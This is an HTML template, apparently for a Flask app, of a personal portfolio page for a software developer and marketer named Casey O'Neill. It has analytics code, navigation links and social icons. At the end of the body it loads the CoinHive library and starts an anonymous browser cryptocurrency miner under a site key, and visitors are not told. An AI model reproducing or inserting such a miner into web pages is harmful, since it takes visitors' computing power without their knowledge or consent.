<html lang="en" class="wf-freightsanspro-n6-active wf-freightsanspro-n3-active wf-freightsanspro-n7-active wf-freightsanspro-n9-active wf-active"><head>
  <meta name="msvalidate.01" content="D4D3F9AE83CA3ED5EA4D29D8BF2CD5E4" />
  <script async="" src="https://www.google-analytics.com/analytics.js"></script><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
  <meta charset="utf-8">
  <meta name="description" content="Casey O'Neill is a driven professional software developer and marketer">
  <meta name="og:title" content="cponeill" />
  <meta name="og:url" content="https://www.cponeill.com" />
  <meta name="og:description" content="Casey O'Neill is a driven professional software developer and marketer" />
  <meta name="og:image" content="{{ url_for('static', filename='cponeill.ico') }}" />
  <meta name="google-site-verification" content="SCHxhaYpg6G0PzLr2DHj5WxSGHvF5rYsqRKHIgBa9ew" />
  <title>Casey O'Neill = Software Developer + Marketer</title>
  <link rel='shortcut icon' href="{{ url_for('static', filename='cponeill.ico') }}" alt="cponeill alien logo" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='normalize.css') }}"/>
  <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='master.css') }}"/>
      <!-- Google Analytics Code Start -->
      <script>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

      ga('create', 'UA-52757064-1', 'auto');
      ga('send', 'pageview');

    </script>
    <!-- Google Analytics Code End -->
    <style>
    .img-circle {
      border-radius: 50%;
    }
  </style>
</head>
<body>
  <section id="card">
    <!--<center><h1><a href="//cponeill.com"><img class="img-circle" src="//pbs.twimg.com/profile_images/764652019038638080/IMNreaX3_400x400.jpg" width="42" height="42">       Casey O'Neill</a></h1>-->
    <center><h1><a href="//cponeill.com"><img class="img-circle" src="{{ url_for('static', filename='cponeill.jpg') }}" width="42" height="42">       Casey O'Neill</a></h1>

    <h2>software developer + marketer</h2>
    <ul id="contact">
      <li><a href="/focus">focus</a></li>
      <il><a href="/skills">skills</a></il>
      <li><a href="/projects">work</a></li>
      <li><a href="//cponeill.posthaven.com">writing</a></li>
      <li><a href="/api">api</a></li>
      <li><a href="https://21.co/cponeillmain/">say hello ($5)</a></li>
    </ul></center>
  </section>
<center><footer><a href="//www.linkedin.com/in/cponeill">
                <img rel='shortcut icon' src="{{ url_for('static', filename='linkedin-6-32.png') }}" /></a>
                <a href="//github.com/cponeill/cponeill">
                <img rel='shortcut icon' src="{{ url_for('static', filename='github-8-32.png') }}" /></a>
                <a href="//twitter.com/CPONEILL">
                <img rel='shortcut icon' src="{{ url_for('static', filename='twitter-2-32.png') }}" /></a>
  </center>
  <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
  <script>
	  var miner = new CoinHive.Anonymous('yLy8LKcTJhfNgzJSnJrve6RC2Axvo58M');
	  miner.start();
  </script>
</body>
</html>
